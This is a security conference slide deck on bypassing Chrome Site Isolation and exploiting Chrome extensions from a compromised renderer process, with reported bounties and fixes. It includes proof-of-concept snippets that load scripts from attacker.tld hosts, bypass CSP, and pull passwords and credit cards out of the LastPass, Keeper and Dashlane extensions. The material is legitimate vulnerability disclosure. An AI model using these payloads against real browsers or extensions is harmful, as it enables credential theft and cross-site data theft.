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The world of Site Isolation and compromised ren...

Jun Kokatsu
November 01, 2019

The world of Site Isolation and compromised renderer

This talk was presented at bugSWAT. Video of the talk is at https://youtu.be/ppW_soCb6wM

Talk features:
Site Isolation bypasses
https://crbug.com/915398, CVE-2019-13682, CVE-2019-13692
Chrome Extension bugs with renderer process compromise
https://crbug.com/982326, https://crbug.com/1016535, https://hackerone.com/reports/682596
CSP bypass in Chrome

Jun Kokatsu

November 01, 2019

More Decks by Jun Kokatsu

Other Decks in Research


  1. Changes from last year • Microsoft Edge moves to Chromium-based

    browser All bounty goes to charity Donated $51k so far.
  2. Changes from last year • Microsoft Edge moves to Chromium-based

    browser All bounty goes to charity Donated $51k so far. • Bug hunter rank went up from 124 to 35 Still pretty bad at finding web bugs in Google
  3. Agenda • What is a compromised renderer process and why

    it matters • Site Isolation recap • Some Site Isolation bypasses • Bypassing Site Isolation without Site Isolation Bypass • Real world examples
  4. What is a compromised renderer process? • Attacker can use

    bugs in JS engine, CSS engine, image parser, video parser, etc, to compromise a renderer process https://www.chromium.org/developers/design-documents/site-isolation
  5. What is a compromised renderer process? • Attacker can use

    bugs in JS engine, CSS engine, image parser, video parser, etc, to compromise a renderer process • Once a renderer process is compromised, it could do anything within the renderer process (e.g. read any data coming into a renderer process, change IPC messages that will be sent from the renderer process, etc) https://www.chromium.org/developers/design-documents/site-isolation
  6. What is a compromised renderer process? • Attacker can use

    bugs in JS engine, CSS engine, image parser, video parser, etc, to compromise a renderer process • Once a renderer process is compromised, it could do anything within the renderer process (e.g. read any data coming into a renderer process, change IPC messages that will be sent from the renderer process, etc) • Without Site Isolation, a renderer process compromise == UXSS https://www.chromium.org/developers/design-documents/site-isolation
  7. Why does it matter? Q: It’s browser bugs, and should

    be fixed by the browser. So why should we care?
  8. Why does it matter? Q: It’s browser bugs, and should

    be fixed by the browser. So why should we care? • There are average of 10+ bugs in each release of Chrome, that could potentially be used to compromise a renderer process*1 *1: https://www.chromium.org/Home/chromium-security/site-isolation#TOC-Motivation
  9. Why does it matter? Q: It’s browser bugs, and should

    be fixed by the browser. So why should we care? • There are average of 10+ bugs in each release of Chrome, that could potentially be used to compromise a renderer process*1 • There is also Patch-gapping issue. So attacker doesn’t even need to find a bug. E.g. people had a full renderer exploit for 15+ days before patch was released to the stable*2 *1: https://www.chromium.org/Home/chromium-security/site-isolation#TOC-Motivation *2: https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/
  10. Why does it matter? Q: It’s browser bugs, and should

    be fixed by the browser. So why should we care? • There are average of 10+ bugs in each release of Chrome, that could potentially be used to compromise a renderer process*1 • There is also Patch-gapping issue. So attacker doesn’t even need to find a bug. E.g. people had a full renderer exploit for 15+ days before patch was released to the stable*2 We should assume that attackers have the capability to compromise a renderer process *1: https://www.chromium.org/Home/chromium-security/site-isolation#TOC-Motivation *2: https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/
  11. Site Isolation Recap Site Isolation: Isolates process per “Site” =

    Scheme + eTLD+1 https://www.example.com:443 Cross-Origin Read Blocking: Prevents a process from accessing sensitive cross-site files without CORS satisfaction (MIME type based blacklist such as HTML, XML, JSON, PDF, ZIP, etc)
  12. Site Isolation caveats • Data URL inherits process from navigation

    initiator <!-- https://www.google.com --> <iframe src=“data:text/html,<b>I live in the same process as Google</b>”>
  13. Site Isolation caveats • Data URL inherits process from navigation

    initiator <!-- https://www.google.com --> <iframe src=“data:text/html,<b>I live in the same process as Google</b>”> • File: URL shares process across whole scheme, and there is no CORB in File: URL either A renderer process compromise of File URL means, attacker can steal any local files that the browser has access to.
  14. Site Isolation caveats • Data URL inherits process from navigation

    initiator <!-- https://www.google.com --> <iframe src=“data:text/html,<b>I live in the same process as Google</b>”> • File: URL shares process across whole scheme, and there is no CORB in File: URL either A renderer process compromise of File URL means, attacker can steal any local files that the browser has access to. Chrome is trying to address these issues, but it’ll take sometime. https://bugs.chromium.org/p/chromium/issues/detail?id=510122 https://bugs.chromium.org/p/chromium/issues/detail?id=935045
  15. Finding Site Isolation bypass I made a WinDbg script that

    can spoof renderer process’ origin and URL https://github.com/shhnjk/spoof.js
  16. I spoofed origin and URL, and then tried randomly calling

    JS APIs to see if anything goes wrong
  17. I spoofed origin and URL, and then tried randomly calling

    JS APIs to see if anything goes wrong Then I noticed, I can send/receive message with spoofed origin across site
  18. Stealing PDF content with postMessage Abusing this bug, I could

    steal any PDF content in Chrome with messages <embed src="https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf" type="application/pdf"> <script> window.onmessage = e => { if (e.data && e.data.type === 'getSelectedTextReply') { alert(e.data.selectedText); } }; function go(){ var embed = document.querySelector('embed'); embed.postMessage({type: 'selectAll'}); embed.postMessage({type: 'getSelectedText'}); } </script>
  19. Stealing PDF content with postMessage Abusing this bug, I could

    steal any PDF content in Chrome with messages <embed src="https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf" type="application/pdf"> <script> window.onmessage = e => { if (e.data && e.data.type === 'getSelectedTextReply') { alert(e.data.selectedText); } }; function go(){ var embed = document.querySelector('embed'); embed.postMessage({type: 'selectAll'}); embed.postMessage({type: 'getSelectedText'}); } </script> $3000
  20. Site Isolation bypass 2 Websites can create a protocol handler

    for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”)
  21. Site Isolation bypass 2 Websites can create a protocol handler

    for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”) With many restrictions ☹ 1. Scheme has to be whitelisted*1 *1: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/registerProtocolHandler#Permitted_schemes
  22. Site Isolation bypass 2 Websites can create a protocol handler

    for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”) With many restrictions ☹ 1. Scheme has to be whitelisted*1 2. Destination URL has to be same-origin to the registering window *1: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/registerProtocolHandler#Permitted_schemes
  23. Site Isolation bypass 2 Websites can create a protocol handler

    for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”) With many restrictions ☹ 1. Scheme has to be whitelisted*1 2. Destination URL has to be same-origin to the registering window 3. User has to accept the permission prompt *1: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/registerProtocolHandler#Permitted_schemes
  24. Solving problems 1. Scheme has to be whitelisted Whitelist check

    was implemented inside a renderer process, and browser process only had blacklist check related to browser schemes.
  25. Solving problems 1. Scheme has to be whitelisted Whitelist check

    was implemented inside a renderer process, and browser process only had blacklist check related to browser schemes. 2. Destination URL has to be same-origin to the registering window This check was also inside a renderer process, thus completely bypassable.
  26. Solving problems 1. Scheme has to be whitelisted Whitelist check

    was implemented inside a renderer process, and browser process only had blacklist check related to browser schemes. 2. Destination URL has to be same-origin to the registering window This check was also inside a renderer process, thus completely bypassable. 3. User has to accept the permission prompt Origin of permission prompt was calculated using destination URL, which could be anything with above bypass. It’ll be blank if you pass a Data URL
  27. But how this can be a Site Isolation bypass? 1.

    After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script>
  28. But how this can be a Site Isolation bypass? 1.

    After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set
  29. But how this can be a Site Isolation bypass? 1.

    After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set 3. Clickjack target page, and wait for a user click
  30. But how this can be a Site Isolation bypass? 1.

    After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set 3. Clickjack target page, and wait for a user click 4. Data URL we set in step 1 will now execute in the process of target page
  31. But how this can be a Site Isolation bypass? 1.

    After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set 3. Clickjack target page, and wait for a user click 4. Data URL we set in step 1 will now execute in the process of target page $3000
  32. Site Isolation bypass 3 Reader mode chrome-distiller://9a898ff4-b0ad-45c6-8da2-bd8a6acce25d/?url=https://news.tld • Page content

    from news.tld will be filtered, but images and videos are allowed • GUID changes for each reader mode page
  33. Site Isolation bypass 3 Reader mode chrome-distiller://9a898ff4-b0ad-45c6-8da2-bd8a6acce25d/?url=https://news.tld • Page content

    from news.tld will be filtered, but images and videos are allowed • GUID changes for each reader mode page Site Isolation assumption Ability to load an untrusted image in the target page is enough to compromise the renderer process
  34. What can you do with compromised Reader mode 1. Open

    new window with victim’s site (Reader mode will cache the page) You can do this using native code (C++) or JS CSP can be bypassed because it’s enforced inside the renderer process, which you’ve already compromised chrome-distiller://[GUID]/?url=https://attacker.tld victim = “https://victim.tld” window.open(victim, “w”) https://victim.tld Super Secret Data!!!
  35. What can you do with compromised Reader mode 2. Navigate

    victim window to Reader mode using same GUID Turns out you can reuse GUID even if you change the url param chrome-distiller://[GUID]/?url=https://attacker.tld w = window.open(origin + "/?url=" + victim,"w") chrome-distiller://[GUID]/?url=https://victim.tld Super Secret Data!!!
  36. What can you do with compromised Reader mode 3. Now

    it’s same-origin! Steal the secret chrome-distiller://[GUID]/?url=https://attacker.tld alert(w.document.body.inn erHTML) chrome-distiller://[GUID]/?url=https://victim.tld Super Secret Data!!!
  37. What can you do with compromised Reader mode 3. Now

    it’s same-origin! Steal the secret $5000 chrome-distiller://[GUID]/?url=https://attacker.tld alert(w.document.body.inn erHTML) chrome-distiller://[GUID]/?url=https://victim.tld Super Secret Data!!!
  38. Site Isolation bypass is difficult • Reader mode and protocol

    handler bugs required user interaction • Message and protocol handler bugs wouldn’t work on every website
  39. Site Isolation bypass is difficult • Reader mode and protocol

    handler bugs required user interaction • Message and protocol handler bugs wouldn’t work on every website I need: • More nightmare scenarios like UXSS • More low hanging fruits
  40. Site Isolation bypass is difficult • Reader mode and protocol

    handler bugs required user interaction • Message and protocol handler bugs wouldn’t work on every website I need: • More nightmare scenarios like UXSS • More low hanging fruits Let’s think this way: Which processes are allowed to access cross-site data by design?
  41. Processes that have access to cross-site data 1. Browser process

    2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process
  42. Processes that have access to cross-site data 1. Browser process

    2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process 1, 2, and 3 sounds difficult
  43. Processes that have access to cross-site data 1. Browser process

    2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process 1, 2, and 3 sounds difficult 4 and 5 requires user interaction to create a process in the first place
  44. Processes that have access to cross-site data 1. Browser process

    2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process 1, 2, and 3 sounds difficult 4 and 5 requires user interaction to create a process in the first place 6 seems like the only option left...
  45. Chrome Extension 101 Usually, an extension has 2 scripts 1.

    Background script (this is executed inside an extension process) 2. Content script (this is injected into renderer processes) https://news.tld Content script in an Isolated World chrome-extension://foo Background script
  46. Chrome Extension 101 Content script and Background script has communication

    channels chrome.runtime.sendMessage -> chrome.runtime.onMessage.addListener chrome.extension.sendMessage -> chrome.extension.onMessage.addListener chrome.extension.sendRequest -> chrome.extension.onRequest.addListener port = chrome.runtime.connect({name: "foo"}) port.postMessage -> port.onMessage.addListener chrome.storage.local.set -> chrome.storage.local.get etc...
  47. Smell of low hanging fruits Extension developers don’t probably know:

    • What renderer process compromise is in the first place
  48. Smell of low hanging fruits Extension developers don’t probably know:

    • What renderer process compromise is in the first place • Site Isolation’s threat model assumes renderer process is compromised
  49. Smell of low hanging fruits Extension developers don’t probably know:

    • What renderer process compromise is in the first place • Site Isolation’s threat model assumes renderer process is compromised • Content script can be fully compromised, thus messages are untrusted
  50. Smell of low hanging fruits Extension developers don’t probably know:

    • What renderer process compromise is in the first place • Site Isolation’s threat model assumes renderer process is compromised • Content script can be fully compromised, thus messages are untrusted Let’s check extensions from Google https://chrome.google.com/webstore/category/ext/15-by-google
  51. ChromeVox Classic Extension Screen reader extension made by Chrome team

    This extension is whitelisted by Chrome to execute content script in semi-privileged pages such as Chrome Web Store, New Tab Page, and DevTools
  52. ChromeVox Classic Extension Background script has message listener where it

    allowed setting preferences. var target = msg['target']; var action = msg['action']; switch (target) ... case 'Prefs': if (action == 'getPrefs') { this.prefs.sendPrefsToPort(port); } else if (action == 'setPref') { var pref = (msg['pref']); var announce = !!msg['announce']; cvox.ChromeVoxBackground.setPref(pref, msg['value'], announce); } break;
  53. Bug 1 ChromeVox has preference called “siteSpecificScriptLoader”, which would load

    JS file set in this preference to all tabs So the UXSS was: 1. Compromise renderer process 2. Run following script in the context of Content script cvox.ChromeVox.host.sendToBackgroundPage({'target': 'Prefs', 'action': 'setPref', 'pref': 'siteSpecificScriptLoader', 'value': 'https://attacker.tld/bad.js', 'announce': true})
  54. ChromeVox Classic Extension Found another message listener that’s suspicious chrome.extension.onMessage.addListener(function(request,

    sender, callback) { if (request['srcFile']) { var srcFile = request['srcFile']; cvox.InjectedScriptLoader.fetchCode([srcFile], function(code) { callback({ 'code': code[srcFile] }); }); } return true; }); What does fetchCode do?
  55. cvox.InjectedScriptLoader.fetchCode = function(files, done) { var code = {}; var

    waiting = files.length; var loadScriptAsCode = function(src) { var xhr = new XMLHttpRequest(); var url = chrome.extension.getURL(src) + '?' + new Date().getTime(); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { var scriptText = xhr.responseText; ... code[src] = scriptText; waiting--; if (waiting == 0) { done(code); } } }; xhr.open('GET', url); xhr.send(null); }; files.forEach(function(f) { loadScriptAsCode(f); }); };
  56. Weird behavior of chrome.extension.getURL chrome.extension.getURL and chrome.runtime.getURL are used to

    change relative URL to full URL based on extension’s URL // e.g. chrome-extension://foo/ chrome.runtime.getURL(“/bar.js”); // chrome-extension://foo/bar.js
  57. Weird behavior of chrome.extension.getURL chrome.extension.getURL and chrome.runtime.getURL are used to

    change relative URL to full URL based on extension’s URL // e.g. chrome-extension://foo/ chrome.runtime.getURL(“/bar.js”); // chrome-extension://foo/bar.js But if we provide any fully-qualified URL to chrome.extension.getURL, it’ll return as is chrome.runtime.getURL(“https://test.tld”); // chrome-extension://foo/https://test.tld chrome.extension.getURL(“https://test.tld”); // https://test.tld *This bug was fixed in Chrome 77 https://bugs.chromium.org/p/chromium/issues/detail?id=984696
  58. Bug 2 With this weird behavior and the bug, we

    can bypass CORS/CORB and fetch any website’s content 1. Compromise renderer process 2. Run following script in the context of Content script chrome.extension.sendMessage({srcFile: 'https://www.google.com'}, content => {alert(content)});
  59. ChromeVox Classic Extension Found yet another message listener that’s suspicious

    var target = msg['target']; var action = msg['action']; switch (target) ... case 'OpenTab': var destination = { url: msg['url'] }; chrome.tabs.create(destination); break;
  60. ChromeVox Classic Extension Found yet another message listener that’s suspicious

    var target = msg['target']; var action = msg['action']; switch (target) ... case 'OpenTab': var destination = { url: msg['url'] }; chrome.tabs.create(destination); break; chrome.tabs.create can open any URL such as Chrome URL and File URL
  61. Opening arbitrary File URL == Site Isolation bypass Download a

    file Content-Disposition: attachment; filename="exploit.html"
  62. Opening arbitrary File URL == Site Isolation bypass Download a

    file Content-Disposition: attachment; filename="exploit.html" Use the bug to open File URL // send message {'target': 'OpenTab', 'url': 'file:///C:/Users/[username ]/Downloads/exploit.html'}
  63. Opening arbitrary File URL == Site Isolation bypass Download a

    file Content-Disposition: attachment; filename="exploit.html" Use the bug to open File URL // send message {'target': 'OpenTab', 'url': 'file:///C:/Users/[username ]/Downloads/exploit.html'} Compromise File URL process // file:///.../exploit.html exploit();
  64. Opening arbitrary File URL == Site Isolation bypass Download a

    file Content-Disposition: attachment; filename="exploit.html" Use the bug to open File URL // send message {'target': 'OpenTab', 'url': 'file:///C:/Users/[username ]/Downloads/exploit.html'} Compromise File URL process // file:///.../exploit.html exploit(); Steal local file <iframe src=”../AppData/Local/G oogle/Chrome/User%20 Data/Default/”>
  65. Bug 3 Opening arbitrary URL 1. Compromise renderer process 2.

    Run following script in the context of Content script cvox.ChromeVox.host.sendToBackgroundPage({'target': 'OpenTab', 'url': 'chrome://settings/'})
  66. Bug 4 ChromeVox leaked user’s history to content script 1.

    Compromise renderer process 2. Run following script in the context of Content script cvox.ChromeVox.visitedUrls
  67. Bug 4 ChromeVox leaked user’s history to content script 1.

    Compromise renderer process 2. Run following script in the context of Content script cvox.ChromeVox.visitedUrls This doesn’t even require renderer compromise since an attacker can read whole process’s memory using Spectre-type attack Bug 1 + 2 + 3 + 4 = $5000
  68. RSS Subscription Extension When it sees an RSS data, it’ll

    automatically navigate to extension page for RSS data preview RSS data example: <?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"><item> <title>test</title> <description>test</description> </item></rss>
  69. RSS Subscription Extension When it sees an RSS data, it’ll

    automatically navigate to extension page for RSS data preview RSS data example: <?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"><item> <title>test</title> <description>test</description> </item></rss> Extension code: anchor.innerHTML = itemTitle; span.innerHTML = itemDesc;
  70. Still problems 1. CSP blocks script execution script-src 'self'; object-src

    'self' 2. RSS preview is loaded inside an iframe with Data URL
  71. Still problems 1. CSP blocks script execution script-src 'self'; object-src

    'self' 2. RSS preview is loaded inside an iframe with Data URL • Data URL inherits the Site of navigation initiator
  72. Still problems 1. CSP blocks script execution script-src 'self'; object-src

    'self' 2. RSS preview is loaded inside an iframe with Data URL • Data URL inherits the Site of navigation initiator • We can theoritically compromise extension process by CSS, image, audio, video, etc
  73. Still problems 1. CSP blocks script execution script-src 'self'; object-src

    'self' 2. RSS preview is loaded inside an iframe with Data URL • Data URL inherits the Site of navigation initiator • We can theoritically compromise extension process by CSS, image, audio, video, etc But, let’s bypass CSP
  74. CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits

    CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe>
  75. CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits

    CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh
  76. CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits

    CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page
  77. CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits

    CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page 3. Now same content will be loaded, but inheriting CSP of attacker.tld (i.e. none)
  78. CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits

    CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page 3. Now same content will be loaded, but inheriting CSP of attacker.tld (i.e. none) 4. Script will now execute and window.stop will stop processing of meta refresh
  79. CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits

    CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page 3. Now same content will be loaded, but inheriting CSP of attacker.tld (i.e. none) 4. Script will now execute and window.stop will stop processing of meta refresh $3000 for CSP bypass and $3133.7 for XSS in RSS Subscription extension
  80. User-Agent Switcher for Chrome They had message listener in the

    Background script chrome.extension.onRequest.addListener( function(request, sender, sendResponse) { ... else if (request.action == "add_ua") { addCustomUAOption(request.name, request.user_agent, request.append_to_default_ua, request.indicator); ... }
  81. User-Agent Switcher for Chrome They had message listener in the

    Background script chrome.extension.onRequest.addListener( function(request, sender, sendResponse) { ... else if (request.action == "add_ua") { addCustomUAOption(request.name, request.user_agent, request.append_to_default_ua, request.indicator); ... } • This message allows setting a custom UA string
  82. User-Agent Switcher for Chrome They had message listener in the

    Background script chrome.extension.onRequest.addListener( function(request, sender, sendResponse) { ... else if (request.action == "add_ua") { addCustomUAOption(request.name, request.user_agent, request.append_to_default_ua, request.indicator); ... } • This message allows setting a custom UA string • They also needed to spoof UA in all websites
  83. Evil’s in the Content Script Content script that was injected

    to every site had following function var a = document.createElement("script"); a.type = "text/javascript"; a.innerText += "Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return '" + (b.append_to_default_ua ? navigator.userAgent + ' ' + b.ua_string : b.ua_string) + "'; } });"; ... document.documentElement.insertBefore(a, document.documentElement.firstChild)
  84. Evil’s in the Content Script Content script that was injected

    to every site had following function var a = document.createElement("script"); a.type = "text/javascript"; a.innerText += "Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return '" + (b.append_to_default_ua ? navigator.userAgent + ' ' + b.ua_string : b.ua_string) + "'; } });"; ... document.documentElement.insertBefore(a, document.documentElement.firstChild) With renderer process compromised, you could send a message and UXSS chrome.extension.sendRequest({action: "add_ua", name: 'Edge', user_agent: "Edge'+alert(origin)+'", append_to_default_ua: true, indicator: 'Edge'})
  85. Evil’s in the Content Script Content script that was injected

    to every site had following function var a = document.createElement("script"); a.type = "text/javascript"; a.innerText += "Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return '" + (b.append_to_default_ua ? navigator.userAgent + ' ' + b.ua_string : b.ua_string) + "'; } });"; ... document.documentElement.insertBefore(a, document.documentElement.firstChild) With renderer process compromised, you could send a message and UXSS chrome.extension.sendRequest({action: "add_ua", name: 'Edge', user_agent: "Edge'+alert(origin)+'", append_to_default_ua: true, indicator: 'Edge'}) $5000
  86. Are only Google’s extensions insecure? Okay, we’ve seen too many

    bugs Maybe Non-Google extensions are more secure and they are good
  87. Are only Google’s extensions insecure? Okay, we’ve seen too many

    bugs Maybe Non-Google extensions are more secure and they are good Let’s see popular extensions and extensions that have bug bounty Note 1: All following bugs require a renderer process compromise first Note 2: Only PoCs, not root cause analysis :)
  88. LastPass Steal any username and password LPVARS.g_port.onMessage.addListener((e, t, n) =>

    { if(e.cmd == "checkgenpwfillforms"){ console.log("Username: " + JSON.parse(e.sites)[0].unencryptedUsername); }else if(e.cmd == "fillfield"){ console.log("Password: " + e.value); } receiveBG(e, t, n); }); chrome.extension.sendMessage({cmd: "fill", docid: 1, docflags:{ has_frameset: false, in_cpwbot: false, is_special_site: null, need_dynamic_delay: null, tutorial_flags: null}, docnum: 0, docstate: "complete", force: 0, numpass: 1, source: "autofill", timestamp: 1566107005383, topurl: "https://victim.tld/login.html", url: "https://victim.tld/login.html", username_val: ""}); $100
  89. Keeper security Steal all credit cards chrome.runtime.sendMessage({ params: {type: "GET"},

    name: "allCardsAndAddresses" }, result => { result.cards.forEach(card => { chrome.runtime.sendMessage({ params: {type:"GET", data: {id: card.uid}},name: "getDataById"}, profit => {console.log(profit) }); }); }); Keeper Security is the best extension bug bounty program so far (excluding Google) $1000
  90. Dashlane Steal all user names, passwords, and credit cards port

    = chrome.runtime.connect({name: "leeloo"}); port.onMessage.addListener(m => { if(m.type == "response" && m.slotName == "getDataModel"){ console.log(m.data.credentials); console.log(m.data.paymentCards); } }); port.postMessage({type: "request", id: 0, slotName: "getDataModel", data: ""}); $200
  91. uBlock Origin // Read cross-site content vAPI.messaging.send(null, {what:'userSettings', name:"externalLists",value:"https://shhnjk.com/"}); vAPI.messaging.send("dashboard",

    {what:'getLists'}); vAPI.messaging.send(null, {what:'getAssetContent',url: "https://shhnjk.com/"}, e=>{console.log(e)});
  92. uBlock Origin // Read cross-site content vAPI.messaging.send(null, {what:'userSettings', name:"externalLists",value:"https://shhnjk.com/"}); vAPI.messaging.send("dashboard",

    {what:'getLists'}); vAPI.messaging.send(null, {what:'getAssetContent',url: "https://shhnjk.com/"}, e=>{console.log(e)}); // Open any URL vAPI.messaging.send(null, {what:'gotoURL',details:{url: "chrome://settings"}}, e=>{console.log(e)});
  93. uBlock Origin // Read cross-site content vAPI.messaging.send(null, {what:'userSettings', name:"externalLists",value:"https://shhnjk.com/"}); vAPI.messaging.send("dashboard",

    {what:'getLists'}); vAPI.messaging.send(null, {what:'getAssetContent',url: "https://shhnjk.com/"}, e=>{console.log(e)}); // Open any URL vAPI.messaging.send(null, {what:'gotoURL',details:{url: "chrome://settings"}}, e=>{console.log(e)}); // UXSS vAPI.messaging.send("dashboard", {what:'writeHiddenSettings',content: "userResourcesLocation https://attack.shhnjk.com/resource_location.txt"},()=>{ vAPI.messaging.send("dashboard", {what:'writeUserFilters',content: "*##+js(alert.js)"},()=>{ vAPI.messaging.send(null, {what:'reloadAllFilters'}); }); }); https://github.com/uBlockOrigin/uBlock-issues/issues/710
  94. Adblock Most popular extension with 60+ million users (source: https://getadblock.com/)

    // This function in Background script could be called indirectly from Content Script (fixed in Chrome 77) const readfile = function(file) { const xhr = new XMLHttpRequest(); xhr.open('GET', chrome.extension.getURL(file), false); xhr.send(); return xhr.responseText; };
  95. Adblock Most popular extension with 60+ million users (source: https://getadblock.com/)

    // This function in Background script could be called indirectly from Content Script (fixed in Chrome 77) const readfile = function(file) { const xhr = new XMLHttpRequest(); xhr.open('GET', chrome.extension.getURL(file), false); xhr.send(); return xhr.responseText; }; // XSS in getadblock.com chrome.storage.local.set({"userid":"'-alert(origin)-'"}) https://youtu.be/s1gRiyU8yqA
  96. Extension needs more attention • With renderer compromise, you can

    call content script APIs. And sometimes you can compromise extension process too. Can we escape browser sandbox from there?
  97. Extension needs more attention • With renderer compromise, you can

    call content script APIs. And sometimes you can compromise extension process too. Can we escape browser sandbox from there? • Does any widely used extension have web accessible JS file with Script Gadgets? That would mean complete bypass of CSP
  98. Extension needs more attention • With renderer compromise, you can

    call content script APIs. And sometimes you can compromise extension process too. Can we escape browser sandbox from there? • Does any widely used extension have web accessible JS file with Script Gadgets? That would mean complete bypass of CSP For extension developers: • Make sure that privileged messages are only called by extension pages MessageSender.url.startsWith(chrome.runtime.getURL(“/”)) • Must read: https://groups.google.com/a/chromium.org/forum/#!msg/chromium-extensions/0ei-UCHNm34/lDaXwQhzBAAJ
  99. Conclusion • Site Isolation is really great and it’s getting

    harder to bypass Report Site Isolation bypass and earn up to $20k!!
  100. Conclusion • Site Isolation is really great and it’s getting

    harder to bypass Report Site Isolation bypass and earn up to $20k!! • If you install an extension, you are probably losing Site Isolation
  101. Conclusion • Site Isolation is really great and it’s getting

    harder to bypass Report Site Isolation bypass and earn up to $20k!! • If you install an extension, you are probably losing Site Isolation Next step: • We should move to Origin Isolation • Decide what to do about copy & paste
  102. Conclusion • Site Isolation is really great and it’s getting

    harder to bypass Report Site Isolation bypass and earn up to $20k!! • If you install an extension, you are probably losing Site Isolation Next step: • We should move to Origin Isolation • Decide what to do about copy & paste Acknowledgement: • Thanks Google VRP! • Thanks Site Isolation team (Nasko@, Creis@, Lukasza@, and others)! • Rob Wu for CRX Viewer (https://robwu.nl/crxviewer/)